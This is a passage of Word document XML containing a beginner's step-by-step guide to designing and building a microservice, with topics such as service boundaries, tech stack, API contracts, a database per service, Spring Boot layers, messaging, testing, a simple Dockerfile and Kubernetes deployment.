      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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at is this microservice responsible for?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770A41CC" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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at data does it own?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8B2E09" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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at other services does it need to communicate with?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79720414" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E" w:rsidP="009A756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Example:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> For an E-commerce app, microservices could be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26137A4A" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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oduct Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544728A5" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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rder Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EF31E2" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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ayment Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B59932E" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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ventory Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56700AA6" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95"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8206490">
          <v:rect id="_x0000_i2755" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="23557253" w14:textId="16B8CDB2" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E" w:rsidP="009A756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w:t>
      </w:r>
      <w:r w:rsidR="00EA2F03" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Choose Tech Stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200FA2D6" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E" w:rsidP="009A756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pending on your ecosystem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E6A690" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E" w:rsidP="009A756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Common choices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3590AC58" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Language:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java (Spring Boot), Node.js, Go, Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A307122" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Database:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> PostgreSQL, MongoDB, Redis (each service should manage its own DB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F70CB90" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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ommunication:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> REST APIs, gRPC, Kafka, RabbitMQ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253E4595" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95"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DBECB12">
          <v:rect id="_x0000_i2756" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="610018C1" w14:textId="64C57736" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E" w:rsidP="009A756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w:t>
      </w:r>
      <w:r w:rsidR="00745FC4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Define the API Contract</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC283B8" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E" w:rsidP="00DC2061">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OpenAPI/Swagger to define:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5044215B" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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dpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C06F08" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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TTP Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517070FA" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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put/Output models</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AB1650" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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atus codes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B83DFB0" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E" w:rsidP="009A756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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676CB90D" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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OST /orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51040934" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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ET /orders/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E1F5CC" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95"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B813473">
          <v:rect id="_x0000_i2757" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="519F47C9" w14:textId="489248BB" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E" w:rsidP="009A756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5️</w:t>
      </w:r>
      <w:r w:rsidR="000551AC" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Design the Database (DB per service pattern)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6691B818" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E" w:rsidP="009A756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ch microservice should own its own data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5054E5" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E" w:rsidP="009A756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rder Service DB):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFEA45F" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E" w:rsidP="000551AC">
      <w:pPr>
        <w:ind w:firstLine="720"/>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rder(id, userId, productId, status, createdDate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F4CF83" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E" w:rsidP="009A756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Liquibase or Flyway for DB migrations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C9D04C" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95"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6C6017D">
          <v:rect id="_x0000_i2758" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D48C941" w14:textId="557301D3" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E" w:rsidP="009A756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6️</w:t>
      </w:r>
      <w:r w:rsidR="004976DE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Build the Microservice (Spring Boot Example)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5D8DB1" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E" w:rsidP="009A756E">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mmon Layers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C11994B" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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troller – REST endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A328B7D" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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rvice – Business logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301E31EC" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Repository – DB access (JPA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116DF9B6" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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TOs – For input/output models</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43117FD4" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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ception Handling – Custom exceptions + Global handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1161B126" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95"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533C67D">
          <v:rect id="_x0000_i2759" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD5BD11" w14:textId="1563389F" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E" w:rsidP="009A756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7️</w:t>
      </w:r>
      <w:r w:rsidR="006763F7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Inter-Service Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C33336" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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nchronous: REST, gRPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38903FD0" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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synchronous: Kafka, RabbitMQ (for decoupled event-driven designs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10ECD3F4" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E" w:rsidP="009A756E">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ample: Order Service publishes an event to Kafka after order is placed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688BE366" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95"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529E72">
          <v:rect id="_x0000_i2760" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="599F9CE4" w14:textId="676D57AE" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E" w:rsidP="009A756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8️</w:t>
      </w:r>
      <w:r w:rsidR="00B5184B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Add Cross-Cutting Concerns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B52B2B0" w14:textId="634BFCF3" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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gging – SLF4J, Logback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9DFE4E" w14:textId="649DA8B3" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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nitoring – Prometheus + Grafana</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E31AD2F" w14:textId="1C4ED386" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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acing – OpenTelemetry, Zipkin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CDBC6A" w14:textId="30B730C4" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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curity – OAuth2/JWT (Spring Security)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C20E45" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95"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2957121">
          <v:rect id="_x0000_i2761" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AA25CA" w14:textId="082C0680" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E" w:rsidP="009A756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9️</w:t>
      </w:r>
      <w:r w:rsidR="00B5184B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Write Tests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E787D1D" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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nit tests for services and utils</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F64AD5A" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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gration tests for REST endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545B6482" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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tools like JUnit, Mockito, Testcontainers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512BB128" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95"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A21C02D">
          <v:rect id="_x0000_i2762" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="143834E2" w14:textId="1F483704" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="00B5184B" w:rsidP="009A756E">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0</w:t>
      </w:r>
      <w:r w:rsidR="009A756E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Containerize with Docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0615D54F" w14:textId="77777777" w:rsidR="007A1AE1" w:rsidRPr="00CE4B95" w:rsidRDefault="007A1A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605171"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM openjdk</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21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA4EDCD" w14:textId="77777777" w:rsidR="007A1AE1" w:rsidRPr="00CE4B95" w:rsidRDefault="007A1A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605171"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COPY targe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ord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ervi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jar ap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jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0224E662" w14:textId="5637A9EE" w:rsidR="007A1AE1" w:rsidRPr="00CE4B95" w:rsidRDefault="007A1A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605171"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ENTRYPOINT </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jav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ja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app.jar"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CE3E7E" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95"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BD6593C">
          <v:rect id="_x0000_i2763" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E406247" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E" w:rsidP="009A756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Deploy to Kubernetes (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37073D52" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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reate Deployment, Service, and Ingress YAMLs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC852A0" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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Helm for templating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1683D0" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95"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92A394C">
          <v:rect id="_x0000_i2764" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCBAB89" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E" w:rsidP="009A756E">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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Best Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698092F7" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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llow 12-factor app principles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0492F2AA" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
